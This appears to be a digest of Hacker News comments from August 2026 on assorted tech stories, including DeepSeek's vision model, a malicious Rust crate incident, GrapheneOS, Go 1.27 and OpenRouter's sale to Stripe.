"This is something I've considered wanting, and I'm glad it exists, but after some thought it's absolutely not at all what I want my Kobo to do. Much like how I wouldn't bring headphones or a Bluetooth speaker with me on a hike, or a laptop with me camping, I don't even want the option of games or anything other than a good reading experience when I'm using my e-reader. I'd assume this is a redundant take, but I don't even know if my Kobo can produce sounds, and I'd like to keep it that way.What's tricky is that although I don't want it to be an unconstrained app platform, I do want the ability to integrate with services that host my things to read. Karakeep, RSS, Google Play Books or Internet Archive, etc.. but I think that could be handled in a more narrow fashion."

"FWIW, some Kobos can run PostmarketOS. I built this UI for my Clara - https://www.github.com/bjesus/air . It runs Firefox, Syncthing, KOReader, and basically anything else you can run on Linux."

Preview of 'DeepSeek-v4-flash-vision-exp'

DeepSeek-v4-flash-vision-exp

"DS being unable to precisely view Playwright screenshots is the only thing I really miss from Sonnet. This is promising.> Images are converted into tokens based on their dimensions, and these tokens are billed together with your text tokens.> Before inference, every image is automatically resized:> - Images with a total pixel count below roughly 384×384 are scaled up while preserving their aspect ratio.> - Larger images are scaled down while preserving their aspect ratio so that the total pixel count after resizing is roughly that of an 800×800 image.> As a result, there is an upper bound of 384 tokens per image: for example, a 2000×2000 image and a 5000×5000 image consume the same number of tokens after resizing. When a request contains multiple images, each image is counted independently under the same rule—there is no separate calculation for multi-image requests.400 tokens per image results in 2,500 images per dollar, if I’m not mistaken.edit: format."

"It fails the simple clock test for me which Qwen3.8 27B got (nearly) right. given an image of a clock https://files.catbox.moe/kgwa5e.pngI asked it "what time does the clock show?" (both on reasoning: high)DS answered: The clock shows *5:10* (and 45 seconds). Here is the breakdown: * *Hour hand (red, shortest):* Pointing at the *5*. * *Minute hand (green, longest):* Pointing at the *2*, which represents 10 minutes. * *Second hand (blue, medium):* Pointing at the *9*, which represents 45 seconds.Qwen answered: The clock shows *8:10* (with the red second hand on the 5, i.e. *8:10:25*).- *Hour hand* (short, blue) → 8 - *Minute hand* (long, green) → 2 (10 minutes) - *Second hand* (thin, red) → 5 (25 seconds)Correct answer is 08:09:25."

"I've heard that DeepSeek v4 Flash 0731 has frequently assumed that it has vision capabilities and then resorts to inventing text-based image analysis tools when it finds that it actually can't see. In that case, this is a great upgrade for the model.Anecdotally, I had to tell 0731 to refrain from viewing screenshots since it kept breaking its sessions by trying to read images."

Preview of 'Show HN: Huzzah – a novel approach to coding with AI'

Show HN: Huzzah – a novel approach to coding with AI

"I think you’re probably missing why it’s exhausting. The problem is not writing English, it’s the rate of change. Programming is meditative, it is a thinking process, the code you output is an artifact of your thinking. Agent-based development… there is no thinking, no meditation, you’re delegating the thinking to a machine, you’re just barking what you want at it, incessantly, endlessly.For businesses it makes sense to abandon programming in favor of delegating to agents that can do more in less time, but for programmers, it is a loss. Either be a programmer and code, or be a delegator and delegate, you aren’t going to make the life of a delegator suck any less by trying to trick yourself into thinking you’re programming."

"I think the reverse direction is more important: taking a massive complex problem/codebase and decomposing it to short pseudocode. Then you could edit the pseudocode and compile it back into the system.That's the way software engineers working on large projects work anyway: you first gather context on the state of the system and read it at a level you can understand. Then you propose a change on the simplified representation, and then holistically update the machine-runnable format ("implementation").I'd be interested in tools that formalize/automate this process more."

"I'm confused, it looks like you've just written a new terse language that now costs money to compile?"

21 August 2026
Preview of 'Aaron Swartz was prosecuted for scraping, while Meta does it without consequence'

Aaron Swartz was prosecuted for scraping, while Meta does it without consequence

"The part that still bothers me so much about the US vs Swartz case is that JSTOR didn't pursue civil litigation against Aaron. It was the US government that pursued him.There was little for the government to lose in the case. In a case vs Meta, at the scale it has reached, it could have wide ranging economic implications limiting the investment in AI, which the US is absolutely not willing to pursue at this point in time (or possibly ever).Basically, being a rich public company provides legal advantages when the US government has similar goals.The whole thing is incredibly sad and exposes the hypocrisy of the US court system and government as a whole.RIP Aaron."

"I don't like talking about this, but first hand knowledge is rarer by the day, and there are entire organizations profiting off this mythology. It's pissing me off. Aaron is not a data point to build stupid metaphors around. He was a bright and broken child.Aaron attracted influential and creepy people and was ill-equipped to handle it. He was also working through a period of sexual awakening while being used by older people to advance their agendas. Little of it would meet contemporary standards of appropriate behavior given his physical and psychological state. I spent some time with him before this went down and was horrified by what I saw.I was not in a position to help him address his mental health, nor in the right physical location to have positive influence, which is what was needed. Then he cracked under the pressure of this and nobody could get through. This was obvious to all involved at the time and that's the part of the prosecution that still makes no sense to me, from all institutions involved. They all have blood on their hands.It's not hard to find continuing bad behavior by individuals near him at the time. I've given up on them being held accountable. Let the child rest."

"He wasn’t prosecuted for scraping. He trespassed into a room with a router, plugged his laptop into it, downloaded papers as quickly as possible, and then rotated his MAC address to dodge the bans that the admin was trying to place on him. That’s very different from downloading a webpage on the open internet.I’m not saying he should or shouldn’t have been prosecuted, but there’s some kind of rose tinted glasses filter around what happened with Aaron, like he just was browsing the web and was suddenly prosecuted. He repeatedly broke in to a physical room and kept changing his MAC address to dodge bans. At least report it with its full context."

Preview of 'Don't paste the AI, please'

Don't paste the AI, please

"Heh. Just got done writing (by hand!) a Principles of AI Use document for my (ironically) AI enablement firm, the first of which is:Write as yourself. You’re being paid for your expertise and insights. Communicate them directly to us. Copying and pasting Claude responses into Slack or an email directly shifts the burden of comprehension and understanding to everyone else, and worse, risks skipping that step for yourself. Even if you’re fundamentally using Claude to gather your thoughts or help you prepare a response, you need to be writing it yourself, in your own voice. Not having Claude ape your voice, or “make it sound less like AI”. You, directly. Doing this will further reinforce your own understanding of the state of things, the same way teaching someone is the best way to learn. As a guideline: for Slack and email comms, this should be near-universally written as you. For deliverables that are longer form and follow a template like proposals, roadmap/discovery work, etc., use of agents is expected but, see Principle #2. (Own the Output.)"

"The complaint here is about lazy answers. But what about all the lazy questions?What's the equivalent of "Google it yourself" these days? When you ask something of somebody, the expectation of the other side to drop everything and do work for you isn't always appropriate/balanced/appreciated.The underlying problem here is that communication is hard; especially if it's not face to face. People can't read your mind or might not get the full context of your question.Back in the day I learned the hard way that sending a long reply to an email just ensures the other side won't read it. You can't assume that you dealt with their request effectively that way. And that was when there was a lot of email to deal with. Lots of people demanding all sorts of things via email and creating more work for each other by sending more email.I learned to 1) never reply instantly to low priority requests, 2) be very brief and clear, 3) that talking to people is almost always the better choice when you get tempted to write a long reply.If you don't like the answers you are getting, maybe reflect on what you are asking, how reasonable that request really was, and how you communicated it. Maybe your question was entirely reasonable and the answer really inappropriately bad. If so, give feedback or talk to the person. But maybe the other side didn't get you. Or maybe they were busy and you are interrupting them. There can be all sorts of reasons why you aren't getting what you expected.It all depends on the context of course. If you are delegating something to somebody that reports to you, you can just tell them off. But if the other side is a colleague, your boss, or a friend you have to be a bit more considerate."

"I’m not convinced tbh, a lot of my colleagues messages are “x broken” or “I do y” … no context whatsoever, and then I have to coax their context for making these decisions.Since people started using Claude now I get full context of everything… might be too much sure, but to be honest over-communicating seems better than under-communicating - sure it’s boring and tedious but that shifts the blockage to me.Otherwise each of these coaxing sessions is something I have to keep in my head until resolved, which is a load in and off itself.And even better - I can point Claude to that message and gives me a summary. You might say this is silly because we are paying the LLM tax, but knowing what to share, and then verifying against my situation are two different things.Sometimes they have checked the wrong thing, sometimes they need guidance, sometimes I need to investigate before I can answer. A full LLM message with context is like “summary of their working context that I can resume on my end” so I don’t waste cycles asking or rechecking etc.And it is still possible to be a learning experience for both of us since the initial message is the start, we can then talk to each other like humans, both much more in sync than before…It is kinda ironic but I think it does push things in a better direction. Would I have loved it if the message was human, direct and to the point - obviously, but we are all busy, we got shit to do, and this is a useful “resume” mechanic"

Preview of 'AliExpress runs silent WebAudio fingerprinting that breaks Bluetooth multipoint'

AliExpress runs silent WebAudio fingerprinting that breaks Bluetooth multipoint

"I wish such shenanigans would simply trigger the little speaker icon most browser display on tabs these days.Given that they don't (at least in my experience), I'm assuming "playing silent audio" is a sufficiently common thing for websites to do to have motivated browsers into doing the slightly more complicated thing of actually analyzing audio streams for content...Now I wonder, does this also allow websites to continue running in the background on mobile browsers? Playing media is one of the very few things that can convince iOS Safari to keep a tab running indefinitely, in my experience."

"With my previous hearing aid I noticed that visiting a wide variety of web sites would cause a change in the amplification of environmental noise. I always assumed it was doing something with Bluetooth, and probably not for a good reason. This is with an iPhone 13 and one Kirkland/phonak hearing aid.I haven’t noticed this recently, but I also now have two newer Phonak hearing aids and a few iOS updates have happened. Maybe the silent Bluetooth shenanigans are less disruptive to my new aids or the programming is different. Surely shenanigans continue."

"I noticed in the last few weeks that if I’d recently opened the AliExpress iOS app (ie. it was backgrounded) my car audio would freak out thinking I was giving it an audio command. Killing the AliExpress app immediately fixed the problem. After seeing it happen more than once I assumed it was something dodgey and uninstalled the app."

Preview of 'Google has stopped pushing Git tags for some Android source code'

Google has stopped pushing Git tags for some Android source code

"They stopped pushing tags for any of the Pixel kernel or userspace driver repositories to AOSP. They also stopped pushing AOSP releases specific to Pixels which is why AOSP now only gets yearly releases, QPR2 releases and security backports to both of those. Other OEMs use the yearly and theoretically also the QPR2 releases. Both the yearly and QPR2 releases get monthly security backports. Since they dropped Pixel support from AOSP, they don't push the releases not shipped by other OEMs anymore.These changes directly led to our Motorola partnership. One of their security people reached out to us after seeing our posts about this with the launch of Android 16. We haven't talked about it much since then since we adapted to it during the several weeks it delayed our Android 16 port. We then continued adapting to it and have fully worked around it. It was an ongoing problem but not a new one and we had accepted we had to deal with it as the new normal.They were previously responding to our kernel source requests within a day. It was often done without hours. Despite the archaic system, this part wasn't that bad. Recently, they've been taking weeks or longer to get back to us for the requests which is ridiculous. It's the direct result of purposely adding a lot of friction with manual handling of the requests even if the delays weren't directly planned by management.Weeks or months of delay is not reasonable for one of the largest tech companies in the world. GPL doesn't set a standard time limit for providing the sources, but that doesn't mean they can delay it indefinitely. They need to do it in a reasonable amount of time. What's reasonable for one of the largest tech companies in the world in 2026 with current technology is not the same as what was reasonable 30 years ago. Google chose to come up with a archaic way of distributing the sources involving someone manually going through a list and sharing Google Drive access. It's a deliberate way of making it painful. If they can't keep up with it and it gets delayed for weeks or months then they're not complying with the GPL by not providing it in a reasonable amount of time. Law is not code and a time limit not being explicitly written down doesn't mean there isn't a limit to what's reasonable for compliance.They'll sell far fewer Pixels because of these overall changes. It pushes GrapheneOS and other projects towards other devices instead. For us, Pixels are being used due to security rather than ease of supporting them. It's now a lot harder to deal with Pixels than it would be for many other devices but they're currently still the most secure option. We're working on changing that and have a lot less reason to contribute to improving Pixels. We helped them fix serious security weaknesses for Pixels including vulnerabilities being exploited in the wild by forensic data extraction companies. Pixel security with the stock OS would be worse without GrapheneOS."

"Let's just forget about the tags, the point is that they're not publishing what Graphene OS needs on any git repository that they can access.Even before that it had been jokes of repositories, but at least you didn't have to ask for someone every time and wait for them to respond to the request.(that's my understanding)"

"I don't think the real focus is on the tags, but on the delay here via a form as well as human interaction.Worded differently, the simplest way to provide the source code is IMO via a URL that you can just wget. At the least this is done by so many projects out there. Google refusing to do so means Google wants to violate the GPLv2, since their alternatives are inferior.https://distrowatch.com/ has many convenient links to URLs on the left side; I often use that to download the latest and greatest and compile it away, e. g. https://ftp.isc.org/isc/bind9/9.20.27/bind-9.20.27.tar.xz as a current example, taken from the left panel."

Preview of 'HTML Can Do That'

HTML Can Do That

"Popover, dialog, invoker commands, our entire production app uses these everywhere and it works really well! The fact that dialogs and popovers are rendered on the "top layer" and that nested popovers are also automatically stacked on top of each other and have 'cascading close' shows how well these standards were designed.The only hard thing is still to position a popover near the element that triggers it, such as when you want to create a context menu that has to render above/below the button that triggered it. There is anchor positioning in CSS now but support is still limited and I find it hard to wrap my head around.LLMs are also terrible at these new standards. If they even know about them, they often think they're not baseline yet and they have almost zero training data compared to the giant mountain of weird JS and CSS that people had to use before the introduction of these standards."

"This comment by yurishimo should not be [dead], imo>Just a heads up but datalist is not really a great solution if you need a strong contract. The user can still type whatever they want into the field and there is no fuzzy filtering or typo mitigation. Once you add those requirements, a library that gives you a more fully featured combobox is likely going to make a lot of sense in your project.It is true! HTML can do a lot of cool stuff, it might get you 100% of the way depending on what you're doing. But if you have a lot of forms where users pick from a value set, and want to enforce no other strings and get a good search experience, datalist does not get you there."

"I'm that minutia in your statistics that is still rocking NoScript in 2026, enabling JavaScript on a site-by-site basis, but this is increasingly difficult with the modern web.Hopefully these and others modern HTML features gain adoption, along with realizing perhaps a Single Page Application isn't necessary in most instances.I don't often have to write frontend code, but when I do, there is very little in terms of interactivity you cannot do with HTML these days, worst case a little sprinkle of something like HTMX."

Preview of 'Show HN: I trained a 125M model to autocomplete piano on-device'

Show HN: I trained a 125M model to autocomplete piano on-device

"This sort of “autocomplete” is actually fundamental to how classical composers were trained.For anyone interested, I’d highly recommend reading Robert Gjerdingen’s article Gebrauchs-Formulas. https://www.researchgate.net/publication/259731561_Gebrauchs...You can also listen to the transcript of four Russian composers, including Rachmaninoff, playing this pattern recognition and generation game at a dinner party in the late 1800’s: https://youtu.be/PlFPOWuwBHI?is=EKBK7QQkJs4MsTCUComposers at the time could do this just by looking at sheet music and audiating, without using a piano."

"I think this is a great project and very HN. Not sure why the comments are so focused on the deliverable- you learned way more and had a much more interesting experience.One think I didn't see mentioned in the post- maybe I missed it- how large was the data? How many samples did you use to pretrain and post-train"

"Classical pianist and software product designer here.I see so much in common with this project and the numerous AI-based UX design tools out there. Whether it's music or UI, now that the "generation" portion of the work costs zero, all that remains is taste.And so much of taste comes from exploring and killing off possibilities that turn out to be dead-ends. I love the idea that models like these will help us find the dead ends faster, or even produce a gem here and there.P.S. if you want another uncanny version of Fur Elise, listen to Beethoven's own 1822 revision: https://www.youtube.com/watch?v=s24TtiGgb6k. His 1810 version that we all know was simpler and more balanced. But for what it's worth, Beethoven didn't publish either of them."

Preview of 'Casio F-B100W-1A'

Casio F-B100W-1A

"Casio has been leaving a lot of money on the table in terms of nostalgia products. There's been a low rumble of demand for the Casio CZ series of synthesizers for a decade or more, and a bunch of non-Casio companies have cashed in on it (Behringer makes CZ-1 Mini, Arturia has CZ V, several other phase distortion synths exist). It's incredibly cheap to replicate, a simple early digital synthesis algorithm that'll run on anything; Korg has been making ARM-based emulation synths (basically a Raspberry Pi-like SoC in a keyboard form factor with some knobs) for a decade or more and I have to assume their margins are very comfortable since most of the guts are off-the-shelf low-cost parts rather than custom chips.But, I guess their watches were always a bigger business than the synths."

"One thing I've never understood (and hopefully some Casio geek can shine a light on): why do almost all old Casio models have a 24/12h time switch taking the premium spot as one of the main 4 buttons, instead of having it buried deep in the (awkward) menus. Seems to me that something like alarm or stopwatch setting or a second menu action button would have been far more useful."

"For anyone interested in modding the F-91W there's also The Ollee Watch, a replacement PCB which adds even more "smart" features.https://www.olleewatch.com/"

Preview of 'Malicious Rust crate Arrayref runs a build-time payload'

Malicious Rust crate Arrayref runs a build-time payload

"GitHub really needs something finer-grain then just pretending the repo never existed during these incidents. [1]The bad package version has also just disappeared from crates.io [2] with no indication its been yanked. There's no security advisory there either [3] "No advisories found for this crate."I feel crates.io was unprepared for a security incident like this since they're managing the response [4][1]: https://web.archive.org/web/20260820145918/https://github.co...[2]: https://crates.io/crates/arrayref/versions[3]: https://crates.io/crates/arrayref/security (I'd give an Wayback link but that's also broken https://web.archive.org/web/20260820150747/https://crates.io...)[4]: https://github.com/rustsec/advisory-db/issues/3161#issuecomm..."

"I think we should be taking a more “batteries included” approach to language and library design. The entire reason we’re in this mess is because we’ve decided it’s ok or maybe even preferable if stdlibs are rail thin, rendering base languages near-unusable.I can very easily build a highly functional, pleasant to use Apple platform app with 5 or fewer top level dependencies. In many cases, I reach for between 0-2 total.There’s no reason why this can’t be replicated elsewhere. The key is to make the programming language reasonably robust with at least 80% of common non-UI dev needs built in and put the remaining 20% and UI bits into a small family of well-supported, community-embraced, preferably first party libraries.That would make it unnecessary to pull in foreign dependencies in the overwhelming majority of projects. What few do get pulled in becomes lightweight, easily verifiable syntactic sugar or libraries with purposes too niche to be worth targeting.Of course this approach can go wrong too. You could easily end up with a monster like Boost, but that comes down to project administration keeping creep under control and proper modular design."

"Thread on the post from main rust blog: https://news.ycombinator.com/item?id=49372853Direct post link: https://blog.rust-lang.org/2026/08/20/supply-chain-attack-on...Initial report: https://github.com/rustsec/advisory-db/issues/3161Other vendor posts:* https://www.stepsecurity.io/blog/arrayref-rust-crate-supply-...* https://research.jfrog.com/post/arrayref-proc-macro1-crates-...* https://www.aikido.dev/blog/two-popular-rust-crates-arrayref..."

Preview of 'Civic Hygiene – avoid building technologies that could be used by a police state (2013)'

Civic Hygiene – avoid building technologies that could be used by a police state (2013)

"Harder than it looks. Everything is dual use. Certainly didn't expect my game development telemetry[1] system used to improve artillery [2]...[1] https://gdcvault.com/play/1012227/Development-Telemetry-in-V...[2] https://www.army.mil/article/85934/solution_to_weapon_develo..."

"The other rule here is that you cannot avoid politics if you want to create a better world. If you want the freedom to develop technology without worrying it will be used by a police state, you need to put in the work to make sure a police state doesn't happen - you cannot ignore politics and just "focus on technology.""

"Recently my wife got locked out of her bank account - all cards blocked, unable to log in to the website or app, so effectively her whole finances were frozen - because she was trying to order a new bank card over the phone and some system couldnt do voice recognition (which we did not know they even used). We were getting ready to get on a plane to NYC, from California (she banks with TD bank) but after a tearful session of phoning anyone and everyone we could at TD, suddenly it magically got reversed.The problem is not just the tech, its building systems where humans are essentially slaves to the system, with no recourse or power over whats happening."

Preview of 'The August 17 outage'

The August 17 outage

"> Both incidents were capacity failures at their core. We failed to scale critical components before demand exceeded their capacity.This is the wrong way to think about this because there's no such thing as infinite capacity. A large distributed system will be simultaneously mostly idle and (in some subcomponents) overloaded. The root cause is not "a component didn't have enough capacity (because of auto scaling failures)", but rather "this complex system collapses (rather than degrade gracefully) when demand exceeds capacity".When components reach capacity limits, the excess traffic of the lowest priority should be rejected. Rejected traffic should not be retried — in fact, not only should clients not retry these errors, these errors should cause client-side throttling. Traffic isolation should be applied — if the cause of the overload is a single client/customer system, no other system should be affected.Nearly a decade ago I wrote about some of the techniques we applied at Google to implement these protections: https://sre.google/sre-book/handling-overload/ Most other large internet services have since copied them, afaik."

" "Since April, monthly commits have grown from 1.4 billion to 2.9 billion. " Wow, that is some incredible growth in a really short time."

"Why does Github not segregate the free offerings from the enterprise or even better, all paid offerings?It is unacceptable that enterprise plans get impacted by traffic on free and public repos. Our repos are neither on the free plan nor are they open. We have not had more AI stuff happening in the last weeks. Our traffic is stable. I would wager that most enterprises did not spike the traffic all of the sudden. Even if they were, we are paying for our quotas. Still our Github actions were breaking and our PRs not viewable at some times.I am hoping this instability is going to cause a Cambrian explosion of forges and if that is happening, Github will be the first victim of the AI revolution.I am working on a truly decentralized / local first code review right now, and a big part of my motivation for this is how bad Github has become. I dont know if I have enough time to build CI as well, but I am hoping others do. Otherwise I will just fall back onto Jenkins."

20 August 2026
Preview of 'OpenLogi'

OpenLogi

"For Linux, there is https://github.com/pwr-Solaar/SolaarBut on another note, the genai content on the website is just so distracting and such a bummer. It sticks out like sore thumb."

"2 anecdotes about Logitech software:I had a high-end webcam that flickered. There should be switch in the software to switch from 50hz to 60hz that'd fix it but it was nowhere to be found. After digging deeper I found that it was only available in English version of software. It was before macOS had Setting to set language per app, so I had to manually replace Polish bundle with English one through binary.Another one: Has K810 keyboard that started in "FN-by-default" mode. K811, Mac version of said keyboard allowed for changing default setting just as K810 on Windows, but K810 on Mac - no dice. Support told me to shell out 200€ on Mac keyboard so I ended up writing small binary switcher [0] that would run after keyboard got connected [0].[0]: https://github.com/exlee/k810_fkeys_mac"

"Ive been building something very similar to this for Razer deviceshttps://github.com/gh123man/OpenSnekSimilar to other reverse engineering threads ive seen recently, AI is empowering us to replace crappy vendor software with something better.Also - OpenSnek documents a mostly complete bluetooth spec for the Razer vendor protocol which as far as I know, hasn't been done anywhere else yet!"

Preview of 'A joke domain purchase turned in geopolitical warfare'

A joke domain purchase turned in geopolitical warfare

"This was fascinating, thank you. I expected to read about legal threats against the folks collecting this data and am glad that those didn't materialize.Also I only realized after finishing the article what a breath of fresh air it was to read something that came straight from another human's brain without LLM intermediation. Thank you to the author for that too."

"It's fun to see habhub in an article. ~10 years ago a group of friends and I launched 2 weather balloons for fun with a GPS logger, APRS transmitter, and a few sensors, and then retrieved it afterwards.I have a bunch of memorable experiences from it, including:1. Under inflating the first balloon because our helium provider was closed, and instead buying lower pressure "party" balloon containers (and not realizing until too late that lower pressure meant more helium left in the containers)2. Chasing down the balloon at night and trying to explain why you wanted to walk onto some guys field to check for a weather balloon3. Later calling a gas station to ask if "some guy just arrived with a weather balloon in their truck" when trying to track down the balloonIf anyone has kids and wants a fun project, I highly recommend it. There are a few companies online that sell kits, and it's neat to watch the different layers of the atmosphere (temperature and wind), and try to "chase" after the balloon and find it afterwards."

"I am part of the team which runs the OpenStreetMap.org infrastructure, we also get a lot of weird and wonderful requests / emails. .mil, .gov, .edu and GeoTLD variants.I should really do a write-up sometime."

Preview of 'OpenRouter is joining Stripe'

OpenRouter is joining Stripe

"I love OpenRouter, long time user. Stripe will hopefully be a good custodian.I just want to point out some features of OpenRouter that make it more than just a model selection and routing endpoint and that I find incredibly useful:0/ Default routing is to the cheapest provider, but they're usually not the most performant. I'd guess 99% of OpenRouter integrations never tweak the default routing. Here you can setup cheapest with performance minimums:https://openrouter.ai/docs/guides/routing/provider-selection...You can also stack model selection in priority1/ Using broadcast you can push all your analytics to clickhouse / s3 / snowflake and a bunch of other compatible destinations. Setup a clickhouse server ($5 VPS[0]) and send all your traces to it:https://openrouter.ai/docs/guides/features/broadcastcustomise your own observability in your dashboards from there. Superwin2/ Model router is also a natural home for llm security - OpenRouter has the beginnings of prompt injection detection:https://openrouter.ai/docs/guides/features/guardrails/prompt...there is also PII detection. This will show up in observability as rejections/blocks etc.There are so many model routing solutions (same with observability, security etc.) but they're all 80% solutions - OpenRouter really rounds out with well implemented features that you need when deploying models at any scale and I gladly pay the toll.[0] not sure if these exist any more but clickhouse is resource efficient"

"Great product, been using it for a while.Turns out even a proxy can be worth $8bn with the right business model behind it.Users get an array of providers competing behind a single API, meaning they have to compete on price and quality not vendor lock-in. This encourages users to join OpenRouter over specific model vendors.Providers get easy access to revenue (and data) and new customers with little to no ad spending, encouraging them onto the platform too.And that's all you need. Win win.Well done and congratulations."

"Using Open in your company name, when there's nothing about it, should be illegal."

Preview of 'Devices with GrapheneOS support should be available in 2027'

Devices with GrapheneOS support should be available in 2027

"Specific devices:>At the time of writing, within ~12 months, in 2027, the 2027 Signature, Razr fold, and Razr flip will meet the hardware security requirements and should have official GrapheneOS support. Motorola is currently porting GrapheneOS to their devices.https://news.ycombinator.com/item?id=49038982"

"I've never really understood why we chase Android-alikes on mobile platforms instead of trying to build on mainstream Linux. I know some folks in the nix community (nix-on-droid and other projects) have tried to bring us closer to this, but projects like Graphene seem to have a lot of traction."

"A year ago or so, the ThinkPhone 23 (Snapdragon 8, 2023, a weird "flagship") was available for 229€ new on various retail stores. The phone also supports Mobian/PostmarketOS and the bootloader is unlockable with no adverse effects.Out of nowhere, it received (along with other older phones) updates up to Android 16.I wouldn't be surprised if the "sudden" update was just a side effect of Motorola preparing for Graphene to be released on these older phones."

Preview of 'Go 1.27'

Go 1.27

"Not mentioned: Floating-point parsing and formatting now uses Russ Cox's uscale algorithm.https://research.swtch.com/fphttps://github.com/golang/go/blob/go1.27.0/src/internal/strc..."

"I love how proactive the crypto team is about post quantum. They released https://pkg.go.dev/crypto/mldsa. The lead maintainer Filippo Valsorda wrote a nice piece here[1] to urge the tech world to start deploying good enough versions of post quantum crypto.[1] https://words.filippo.io/crqc-timeline/"

"Brace for a wave of drive-by pull-requests swapping google/uuid [1] out for the now-standard uuid package [2].Kubernetes project will be the first one [3] I guarantee it.[1] https://pkg.go.dev/github.com/google/uuid[2] https://go.dev/pkg/uuid[3] https://github.com/kubernetes/kubernetes/blob/2220c3853a2402...[4] https://github.com/google/uuid/issues/221"

Preview of 'Remote workers report the highest well-being in study of 7,700 employees'

Remote workers report the highest well-being in study of 7,700 employees

"…of a single company> Researchers analyzed survey data from 7,704 employees at a large healthcare organization.I’ve been remote and worked for remote companies for a long time. In my observation, the well-being is bimodal. The people who adapt well to remote thrive. There are a lot of people who think they’re going to love remote who ultimately flame out from the loneliness, isolation, lack of visual boundaries between work and home life, and lack of externally enforced routine.It’s really sad when the latter happens because it’s almost always someone who was hired for their great work and abilities. Then over time they get drained and you can see that the remote work wasn’t what they expected.It’s basically impossible to predict who will fall into each category at the interview stage, or at least I can’t do it. Prior remote work success (not just experience) is the best indicator but it’s hard to evaluate, too. Some of the most difficult remote hires I’ve worked with had past remote work experience, but it’s only after being hired that you learn they struggled at those companies too."

"Being able to work remotely is like being sentenced to prison and then finding a get-out-of-jail-free card.I always strive to do my best at work and make a good impression. But I have absolutely 0 interest in the product, the mission, the culture, the personal or collective aspirations of owners, shareholders, leaders or "leadership", or who they are as people. I generally like my coworkers and we get along, but that's not worth a 2 hour round trip in the car, or using a public washroom, or eating in a cafeteria, or sitting uncomfortably at a desk all day, or listening to everyone's boring stories.The best part though, is no team building nonsense, no company BBQs or pizza days, no casual Fridays, no boss dropping in for a one on one, no psychos trying to get the energy level up with a "LETS GOOOO TEAM!!"Just doing a good job for good pay and being treated like an adult. I didn't know working could be like this when I was starting out."

"Here is the actual study: https://www.frontiersin.org/journals/psychology/articles/10....They didn’t control for occupation, pay, managerial status etc.. An on-site physical job like nurse, facilities, or technician was compared to predominantly remote administrative jobs."

Preview of 'Moderna reports first positive Phase 3 for mRNA neoantigen therapy in melanoma'

Moderna reports first positive Phase 3 for mRNA neoantigen therapy in melanoma

"This is great news! I think people forget how anti-skin cancer protocols even as simple as applying suntan lotion weren't as popular as recent as 50-60 years ago. Lots of "sun children" of the 50s and 60s are now feeling the repercussions of only applying baby oil and are getting hit with lots of melanoma."

"Substantially better link:https://www.merck.com/news/merck-and-moderna-announce-phase-...Still no actual Phase 3 data presented."

"My father is currently dying of malignant melanoma with brain metastasis...I wish this treatment was available a few years ago."

Preview of 'Cerebras CS-4'

Cerebras CS-4

"God I wish they'd back up all of those claims by offering a subscription of Kimi K3 and GLM 5.3, not some outdated GLM 4.7 instance that they then proceed to call a preview model and say that they'll remove it, leaving users only with GPT-OSS 120B which is nigh useless nowadays: https://support.cerebras.net/articles/9996007307-cerebras-co... and https://www.cerebras.ai/pricingGuess they don't care about regular devs atm and are focused only on hardware sales."

"I think the fun takeaway from this is that GPT 5.4 is probably 45B active parameters and GPT 5.6 Sol is closer to 50B."

"AMD along with cerebras may probably compete with NVIDIA monopoly in near future. Also, NVIDIA will have competition form multiple companies. Just my prediction."

Preview of 'How does IKEA come up with names for its products?'

How does IKEA come up with names for its products?

"Clear and interesting names is extremely good customer experience. Most companies name their products straight from the ERP system, creating incomprehensible codes that sounds like they come from Star Trek.Ikea has pioneered so much within service design (design beyond the actual product). The in-store journey, the self-assembly, the assembly instructions, clear naming, clear product display, in-store restaurant experience. The list goes on.After Ingvar Kamprad retired, he continued travelling the world to do store inspections. Full-day walkthroughs that started in the morning at the loading bay and continued throughout the store. Everything was inspected and a list of follow-up actions was created for the store manager."

"My favorite is `fejka` for the artificial plant/flower.I think "being as widely-understandable pun as possible" is definitely one of their naming priorities."

"> Every possible product name is carefully checked to avoid undesirable meanings in other languages, political or religious affiliations and fit into our global profile.I present to you "Svalka" wine glasses. Dump", rubbish heap", or easy, promiscuous woman of ill repute in informal Baltic (and Slavic?) slang."

Preview of 'Geolocating a random island using geometry and CUDA programming'

Geolocating a random island using geometry and CUDA programming

"Excellent write up and an enjoyable read! Reminds me of the “good old times” where posts on HN were written by humans and with a specific writing style like yours. You could’ve used a little bit more of geoguessing to narrow down results, or do a brute force visual check on the last hundred or so ;-)"

"For drones and missiles, this technique is known as Terrain Contour Matching. If terrain contour are measured optically, navigation is independent of RF jamming, unlike GNSS.https://en.wikipedia.org/wiki/TERCOM"

"Super fun! Interestingly, this is how JPL was able to significantly reduce the Mars 2020 landing radius on Mars. Cameras onboard take pictures of the terrain and match that to maps to figure out where the lander is. https://www-robotics.jpl.nasa.gov/what-we-do/flight-projects..."

19 August 2026
Preview of 'The Amazon tax'

The Amazon tax

"I see the exact same thing on Play Store, and I think Google is outright complicit in fraud. The top result when you search for an app, even if by exact name, is always, literally 100% of the time, not the app you are looking for, but some other ad-infested knockoff spyware shit whose developer paid Google to be placed before the real thing."

"> The highest-yielding ad my publisher has tested so far is the search “Seth Godin The Knot“I think it would be interesting to see legal action here. I’m not a lawyer, but I feel like there should be at least three ways to go after this:1. Trademark infringement. If Amazon is using someone’s search that is clearly searching for a specific product, possibly trademarked, it seems inappropriate for them to serve up an ad for a competitor at higher priority than the actual result.2. Fraud. If I search for a product that Amazon sells and Amazon shows me an ad for a different product first and hides the product I searched for below the fold, they are effectively telling me that they don’t have the product I searched for and possibly that it doesn’t exist. It seems to me that this is deceiving me for commercial gain.3. Fraud again. If I search for a specific book and Amazon shows me an ad for that book, I think they’re trying to trick me into clicking that ad so they get extra revenue even if I don’t intend to click an ad. (And they’ve defrauded the ad buyer too. Those clicks are bogus. Seth Godin should not be charged for a click when the clicker was searching for the book by a good approximation of its name!)Someone should file the multi-hundred-billion-dollar class actions :)"

"When searching on Amazon I always change sort to Best Sellers. The default is Featured Items which shows ads at the top and throughout results. For some searches that have a small number of real results, the majority of the list will be ads. Sorting by Best Sellers eliminates all ads in the results."

Preview of 'Israel creates fake think tank in likely attempt to dupe AI chatbots'

Israel creates fake think tank in likely attempt to dupe AI chatbots

